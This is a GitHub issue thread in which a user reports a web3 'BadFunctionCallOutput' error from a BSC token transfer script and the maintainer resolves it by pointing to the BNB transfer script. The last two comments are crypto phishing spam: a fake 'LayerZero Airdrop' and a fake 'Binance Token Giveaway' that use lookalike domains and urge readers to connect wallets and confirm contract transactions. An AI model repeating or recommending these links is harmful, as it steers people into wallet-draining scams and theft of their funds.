### ISSUE TITLE
运行报错！！

### ISSUE THREAD

**Issue by wushi13** [hotbroker/jiucai-dreame#5]
2023-11-01 00:56:48,919 - root - INFO - 1/50)acc:0x4884ACbDcf1F622a3719B1298be05bcCc077BBF4
gasprice 5000000000
sendvalue 0.00065
Traceback (most recent call last):
  File "C:\Python310\lib\site-packages\web3\contract.py", line 1537, in call_contract_function
    output_data = web3.codec.decode_abi(output_types, return_data)
  File "C:\Python310\lib\site-packages\eth_abi\codec.py", line 196, in decode_abi
    return self.decode(types, data)
  File "C:\Python310\lib\site-packages\eth_abi\codec.py", line 210, in decode
    return decoder(stream)
  File "C:\Python310\lib\site-packages\eth_abi\decoding.py", line 127, in __call__
    return self.decode(stream)
  File "C:\Python310\lib\site-packages\eth_utils\functional.py", line 45, in inner
    return callback(fn(*args, **kwargs))
  File "C:\Python310\lib\site-packages\eth_abi\decoding.py", line 173, in decode
    yield decoder(stream)
  File "C:\Python310\lib\site-packages\eth_abi\decoding.py", line 127, in __call__
    return self.decode(stream)
  File "C:\Python310\lib\site-packages\eth_abi\decoding.py", line 198, in decode
    raw_data = self.read_data_from_stream(stream)
  File "C:\Python310\lib\site-packages\eth_abi\decoding.py", line 305, in read_data_from_stream
    raise InsufficientDataBytes(
eth_abi.exceptions.InsufficientDataBytes: Tried to read 32 bytes.  Only got 0 bytes

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "E:\jiucai-dreame-master\jiucai-dreame-master\transfer_token_bsc.py", line 121, in <module>
    go()
  File "E:\jiucai-dreame-master\jiucai-dreame-master\transfer_token_bsc.py", line 116, in go
    send_to_accounts(srckey, tolist, sendvalue, token)
  File "E:\jiucai-dreame-master\jiucai-dreame-master\transfer_token_bsc.py", line 89, in send_to_accounts
    send_amount(key, to_addr, sendamount,tokenobj)
  File "E:\jiucai-dreame-master\jiucai-dreame-master\transfer_token_bsc.py", line 32, in send_amount
    decimals = int(tokenobj.functions.decimals().call())
  File "C:\Python310\lib\site-packages\web3\contract.py", line 970, in call
    return call_contract_function(
  File "C:\Python310\lib\site-packages\web3\contract.py", line 1554, in call_contract_function
    raise BadFunctionCallOutput(msg) from e
web3.exceptions.BadFunctionCallOutput: Could not transact with/call contract function, is contract deployed correctly and chain synced?

**Comment by hotbroker** [comment]
你要么链rpc不对，要么合约 地址不对

**Comment by wushi13** [comment]
> 你要么链rpc不对，要么合约 地址不对

我是转BNB 需要填BNB的合约地址吗？

**Comment by hotbroker** [comment]
> > 你要么链rpc不对，要么合约 地址不对
> 
> 我是转BNB 需要填BNB的合约地址吗？

转bnb，你应该用这个脚本 transfer_bsc.py

**Comment by wushi13** [comment]
> > > 你要么链rpc不对，要么合约 地址不对
> > 
> > 
> > 我是转BNB 需要填BNB的合约地址吗？
> 
> 转bnb，你应该用这个脚本 transfer_bsc.py

好的 解决了 谢谢

**Comment by vokaplok** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)
